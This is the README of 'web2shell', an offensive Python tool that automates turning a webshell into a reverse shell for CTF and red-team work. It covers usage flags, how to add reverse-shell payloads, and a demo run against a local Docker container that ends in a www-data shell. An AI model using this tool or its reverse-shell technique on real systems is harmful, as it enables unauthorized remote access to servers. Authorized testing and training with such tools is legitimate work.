A Python program used to automate converting webshells into reverse shells. If you regularly do CTF, HTB, or red teaming you've probably spent a good chunk of time testing payloads to convert a webshell into a reverse shell. This tool aims to simplify this process.
Credit for the reverse shells goes to PayloadAllTheThings.
usage: web2shell [-h] [-v] [-i INTERFACE] [--force] [--ip IP] [--port PORT] [--nc NC] [--only [ONLY ...]] url
Automate converting webshells into reverse shells.
positional arguments:
url webshell URL, replace the provided command with "SHELL". ex: https://example.com/shell.php?cmd=SHELL
options:
-h, --help show this help message and exit
-v, --verbose verbose command output
-i INTERFACE, --interface INTERFACE
the interface to use when listening for a remote shell. If none is provided you will be prompted to select one.
--force force command execution even if initial check is invalid
--ip IP IP address of your own listener (skips listener setup if both IP and port are set)
--port PORT port of your own listener
--nc NC path to local nc binary
--only [ONLY ...] list of bins to test, ignores all others. ex: --only python php node
Providing an IP and port will cause the program to skip the listener setup and assume you already have netcat/a comparable listener running at that address.
Please note: this program currently is only intended to be used on and against Linux machines.
Install the required python modules with pip (pip3 install -r requirements.txt.) You will need a local copy of nc. The program will attempt to find it automatically. If it can't (it might not be in your $PATH), please specify the path to the binary with the --nc flag.
The included payloads have all been tested on a simple webshell and work. If you'd like to add more, please feel free.
- Edit the
data/payloads.pyfile. - Add a new object to the
payloadsdict. Thekeyshould be the name of the bin, and the value should be alistobject of payloads. - Replace all instances of the reverse
IPwithIPHERE, the port withPORTHERE, and the binary name withPATHHERE. If the payload specifies the shell replace it withSHELLHERE.
Example execution on local Docker image (see demo/README.md)
[evan@ejedev web2shell]$ python3 web2shell.py http://127.0.0.1:8080/cmd.php?cmd=SHELL
o o o o
O .oOOo. O O O
O O o o o
o o O O O
'o O .oOo. OoOo. O' .oOo OoOo. .oOo. o o
O o o OooO' O o O `Ooo. o o OooO' O O
o O O O o O .O O o O O o o
`Oo'oO' `OoO' `OoO' oOoOoO `OoO' O o `OoO' Oo Oo
---------------------------------------------------
v0.1.2 @ejedev
Verifying commands can be executed...
Available interfaces...
[-] lo
[-] enp4s0
[-] br-3bd00064871f
[-] docker0
[-] br-a01c69609a5e
[-] br-a193929c6ae4
[-] br-aa3534e13396
[-] br-c7551daa06d2
[-] br-2369a8165a53
[-] veth7b49643
No interface provided. Please enter the name of an available interface or 'exit' to quit:
> docker0
docker0 selected. Address to use is 172.17.0.1
Testing ports...
[x] 1025 already in use or unavailable.
[-] 1026 available!
Finding local nc binary...
nc target at /usr/bin/nc
Final connection string will be 172.17.0.1:1026...
Finding bins...
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1026
Ncat: Listening on 0.0.0.0:1026
[-] perl found at /usr/bin/perl
[-] php found at /usr/local/bin/php
[-] python3 found at /usr/bin/python3
[-] ruby found at /usr/bin/ruby
[-] go found at /usr/bin/go
[-] node found at /usr/bin/node
Finding shells...
[-] bash found at /usr/bin/bash
[-] sh found at /usr/bin/sh
Executing reverse shell...
Bins to test: 6
Shells to test: 2
[!] Attempting perl payloads for path /usr/bin/perl
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:40170.
www-data@849d7a9007c8:/var/www/html$